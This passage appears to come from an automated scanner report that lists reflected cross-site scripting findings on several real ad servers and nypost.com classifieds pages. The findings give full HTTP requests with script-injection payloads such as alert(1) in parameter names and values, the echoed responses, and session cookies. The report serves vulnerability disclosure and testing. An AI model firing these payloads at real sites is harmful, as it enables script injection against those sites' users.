<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting ...[SNIP]... B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=127826414616802'-alert(1)-'dda5ef572d6&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab% ...[SNIP]...
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 71b29<script>alert(1)</script>ab0b90d15be was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=87177571b29<script>alert(1)</script>ab0b90d15be&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:47:57 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2509
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "87177571b29<script>alert(1)</script>ab0b90d15be"
The value of the placementId request parameter is copied into an HTML comment. The payload 36330--><script>alert(1)</script>193e77e2319 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=150617136330--><script>alert(1)</script>193e77e2319&pid=871775&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:47:55 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3249
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "150617136330--><script>alert(1)</script>193e77e2319" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 854f2--><script>alert(1)</script>8b7777092ef was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775&ps=-1854f2--><script>alert(1)</script>8b7777092ef&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:48:01 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1854f2--><script>alert(1)</script>8b7777092ef" -->
...[SNIP]...
1.35. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68684"-alert(1)-"a9e869a53db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1§ion=1591356&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&68684"-alert(1)-"a9e869a53db=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805804732&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:48:28 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Fri, 26 Nov 2010 20:48:28 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?68684"-alert(1)-"a9e869a53db=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=5a738589%2d032a%2d45ab%2da7ad%2deba47ded6846&s=1591356&_salt=1154617033";var RM_POP_COOKIE_NAME='ym ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b81e"-alert(1)-"c90a8ec1575 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/860615/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4034247;misc=1290805804740;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f6b81e"-alert(1)-"c90a8ec1575 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/backissues/backissues.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1065
var projectid = 2263; var playerwidth = 300; var playerheight = 250; //var clickurl = "ADCLICKESC"; var identifier = "TremorMedia"; document.write("\n"); document.write("<scr"+"ipt src=\"http://conten ...[SNIP]... .net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f6b81e"-alert(1)-"c90a8ec1575http://dimestore.com/defaultclick\"> ...[SNIP]...
1.37. http://adserver.adtechus.com/addyn/3.0/5132/860615/0/170/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5132/860615/0/170/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feec2"-alert(1)-"eb1713b52d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/860615/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4034247;misc=1290805804740;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&feec2"-alert(1)-"eb1713b52d2=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/backissues/backissues.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 1068
var projectid = 2263; var playerwidth = 300; var playerheight = 250; //var clickurl = "ADCLICKESC"; var identifier = "TremorMedia"; document.write("\n"); document.write("<scr"+"ipt src=\"http://conten ...[SNIP]... net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&feec2"-alert(1)-"eb1713b52d2=1http://dimestore.com/defaultclick\"> ...[SNIP]...
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17625'-alert(1)-'e1d9cf19487 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/989306/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4054950;misc=1290805825390;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f17625'-alert(1)-'e1d9cf19487 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... .net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f17625'-alert(1)-'e1d9cf19487http://clk.redcated/MRT/go/250056024/direct;wi.1;hi.1/01/804449534" target="_blank"> ...[SNIP]...
1.39. http://adserver.adtechus.com/addyn/3.0/5132/989306/0/170/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/addyn/3.0/5132/989306/0/170/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e69'-alert(1)-'12352a774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5132/989306/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4054950;misc=1290805825390;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&33e69'-alert(1)-'12352a774=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/promotions/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1
Response
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript
function __flushCode() { if (!__bCodeFlushed) { var span = parent.document.createElement("SPAN" ...[SNIP]... net/click%3Bh%3Dv8/3a5e/3/0/%2a/l%3B229319091%3B0-0%3B0%3B44600216%3B4307-300/250%3B36359077/36376957/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&33e69'-alert(1)-'12352a774=1http://clk.redcated/MRT/go/250056024/direct;wi.1;hi.1/01/804455856" target="_blank"> ...[SNIP]...
1.40. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48eb"-alert(1)-"c90fa3ab3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=pop&ad_size=0x0§ion=1584519&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1\&f48eb"-alert(1)-"c90fa3ab3ed=1 HTTP/1.1 Host: adserving.cpxinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:48:50 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Fri, 26 Nov 2010 20:48:50 GMT Pragma: no-cache Content-Length: 4419 Age: 0 Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1584519; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&f48eb"-alert(1)-"c90fa3ab3ed=1&s=1584519&_salt=3452949406";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adeb9"-alert(1)-"fbfe9df8c83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/pingadeb9"-alert(1)-"fbfe9df8c83/ HTTP/1.1 Host: apartments.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:51:29 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDY4OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51f71"><script>alert(1)</script>3d1d398a515 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajax/ping51f71"><script>alert(1)</script>3d1d398a515/ HTTP/1.1 Host: apartments.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:51:29 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDY4OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.43. http://apartments.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://apartments.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b07a5"-alert(1)-"e41510f6096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post/?b07a5"-alert(1)-"e41510f6096=1 HTTP/1.1 Host: apartments.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:49:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDU4Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11400
1.44. http://apartments.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://apartments.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402ed"><script>alert(1)</script>65f26b72b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post/?402ed"><script>alert(1)</script>65f26b72b6c=1 HTTP/1.1 Host: apartments.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809430344; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY5Mzt9; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
